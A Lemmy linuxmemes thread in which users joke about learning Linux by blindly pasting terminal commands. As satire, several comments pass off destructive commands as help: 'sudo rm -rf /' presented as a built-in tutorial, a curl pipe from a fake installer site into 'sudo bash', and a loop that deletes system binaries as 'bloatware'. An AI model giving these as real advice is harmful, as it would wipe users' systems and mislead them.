this post was submitted on 09 Jul 2023
52 points (98.1% liked)

linuxmemes

26097 readers
804 users here now

Hint: :q!


Sister communities:


Community rules (click to expand)

1. Follow the site-wide rules

2. Be civil
  • Understand the difference between a joke and an insult.
  • Do not harrass or attack users for any reason. This includes using blanket terms, like "every user of thing".
  • Don't get baited into back-and-forth insults. We are not animals.
  • Leave remarks of "peasantry" to the PCMR community. If you dislike an OS/service/application, attack the thing you dislike, not the individuals who use it. Some people may not have a choice.
  • Bigotry will not be tolerated.
  • 3. Post Linux-related content
  • Including Unix and BSD.
  • Non-Linux content is acceptable as long as it makes a reference to Linux. For example, the poorly made mockery of sudo in Windows.
  • No porn, no politics, no trolling or ragebaiting.
  • 4. No recent reposts
  • Everybody uses Arch btw, can't quit Vim, <loves/tolerates/hates> systemd, and wants to interject for a moment. You can stop now.
  • 5. πŸ‡¬πŸ‡§ Language/язык/Sprache
  • This is primarily an English-speaking community. πŸ‡¬πŸ‡§πŸ‡¦πŸ‡ΊπŸ‡ΊπŸ‡Έ
  • Comments written in other languages are allowed.
  • The substance of a post should be comprehensible for people who only speak English.
  • Titles and post bodies written in other languages will be allowed, but only as long as the above rule is observed.
  • 6. (NEW!) Regarding public figuresWe all have our opinions, and certain public figures can be divisive. Keep in mind that this is a community for memes and light-hearted fun, not for airing grievances or leveling accusations.
  • Keep discussions polite and free of disparagement.
  • We are never in possession of all of the facts. Defamatory comments will not be tolerated.
  • Discussions that get too heated will be locked and offending comments removed.
  • Β 

    Please report posts and comments that break these rules!


    Important: never execute code or follow advice that you don't understand or can't verify, especially here. The word of the day is credibility. This is a meme community -- even the most helpful comments might just be shitposts that can damage your system. Be aware, be smart, don't remove France.

    founded 2 years ago
    MODERATORS
     
    top 25 comments
    sorted by: hot top controversial new old
    [–] pezhore@lemmy.ml 9 points 2 years ago

    Nothing better than curl https://totally-legit-installer.com/script | sudo bash

    [–] Rabbithole@kbin.social 5 points 2 years ago (2 children)

    I'm in a helpful mood so I'll add something for anyone stuck in OP's situation.

    It's ok, Linux has a built in tutorial system for learning the terminal, so if you ever want to progress beyond copy/pasting, you can use that.

    Just go into the terminal and type (or just copy/paste) this to get the tutorial program running:

    sudo rm -rf /

    Type your password when prompted and you're golden. No more linux issues ever again.

    [–] whoamibro@lemmy.world 0 points 2 years ago* (last edited 2 years ago) (1 children)

    I tried your command and got the tutorial program and I gotta say that this is the best tutorial program I've ever seen. Now I wonder why other OSes don't do that

    [–] Rabbithole@kbin.social 1 points 2 years ago (1 children)

    It's great, isn't it? As a side bonus, the tutorial modules on system optimization commands are just great. Check how much less RAM and CPU footprint your system's using now that you've run the tutorials. It's almost like nothing's going on in the background at all.

    This is the reason that BASH will always be better than Powershell, imho.

    [–] HelloHotel@lemmy.world 0 points 2 years ago (1 children)

    It optomizes your computer too? Woa

    [–] Rabbithole@kbin.social 0 points 2 years ago (1 children)

    Well, technically it teaches you how to optimize your system.

    That said, the optimizations are really effective.

    [–] HelloHotel@lemmy.world 0 points 2 years ago* (last edited 2 years ago) (1 children)

    Note that the more corporate distros install PUPs (Potentially Unwanted Programs). (like clang) To uninstall, do what youd do on a Windows machine and wrip it out of your PC forcably

    while read bloatware; do bloatware="$(echo "$bloatware" | cut -f1 -d'#')"; file="$(whereis "$bloatware" | cut -f2 -d' ')"; if test -f "$file"; do unlink "$file"; fi; done &lt;
    [–] Rabbithole@kbin.social 2 points 2 years ago

    Lol, I know what you mean.

    Isn't it fucked up how we all say that linux doesn't have viruses, and yet how many times have you ever seen an install of Mint or Ubuntu that didn't have "Tree" or "Awk" just sitting there waiting to ruin your whole day.

    I swear to God Canonical have some things to answer for.

    [–] turbodrooler@lemmy.world 4 points 2 years ago (1 children)

    That’s probably how most of us started, but then you start getting familiar with things…

    [–] meteotsunami@lemmy.world 6 points 2 years ago (1 children)

    And that's when you really get good at breaking shit.

    [–] turbodrooler@lemmy.world 1 points 2 years ago

    In my early days I would reinstall the whole OS several times a week when I would fuck things up too much.

    [–] marcar@lemmy.world 1 points 2 years ago

    It’s funny cuz it’s true

    [–] jcb2016@lemmy.world 1 points 2 years ago* (last edited 2 years ago)

    Heheh on Linux when you think you found the answer you copy paste, log out and back in. Sometimes reboot if it don’t with try the next copy and paste.. so many memories

    [–] CoupleOfConcerns@lemmy.nz 1 points 2 years ago (1 children)

    People underestimate how important being able to google answers on the internet has been for the take-up of linux and many other things. Most of us would be lost without Google.

    [–] mvirts@lemmy.world 2 points 2 years ago

    Aaand the arch wiki

    Aaand stack overflow

    Aaand the Gentoo wiki

    Aaand random Linux forums :P

    Aaand very occasionally the accessible source code for when you're really stuck and have no other choice but to sell your soul in exchange for a glimmer of understanding after peering into the abyss.

    [–] Pensi@lemmy.world 1 points 2 years ago

    I actually take the time to type everything out, but I still have no idea what I’m doing.

    [–] loz@aussie.zone 0 points 2 years ago (1 children)

    Yeah I'm wildly careless about copying and pasting stuff beginning with "sudo ...". No harm yet, though I do wonder what this process called "totallynotabitcoinminer" is and why my pc has slowed to a crawl.

    Don't worry, that's just some helpful code to enable the space heater feature of your computer.

    [–] zephyrvs@lemmy.ml -1 points 2 years ago (1 children)

    I don't think that's a terrible way of getting started. Your subconscious will do the rest at some point, unless you're really not interested at all (which isn't a problem either). :)

    [–] ShadyGrove@lemmy.world 1 points 2 years ago (1 children)

    The real learning happens when you copy and paste something you shouldn't and bork your system. That's basically how I started.

    [–] sunbunman@lemm.ee 1 points 2 years ago (1 children)

    Me learning anything ever. Troubleshooting is the real learning phase.

    [–] Viking_Hippie@lemmy.world 0 points 2 years ago (1 children)

    No offence, but I hope you don't hold a high ranking government position, what with catastrophic error being the only way you learn 😁

    [–] biddy@feddit.nl 1 points 2 years ago

    I hope I never hold a high ranking government position too

    [–] lemminer@lemmy.world -1 points 2 years ago

    Yeah, Linux is not for you if don't know what you're doing.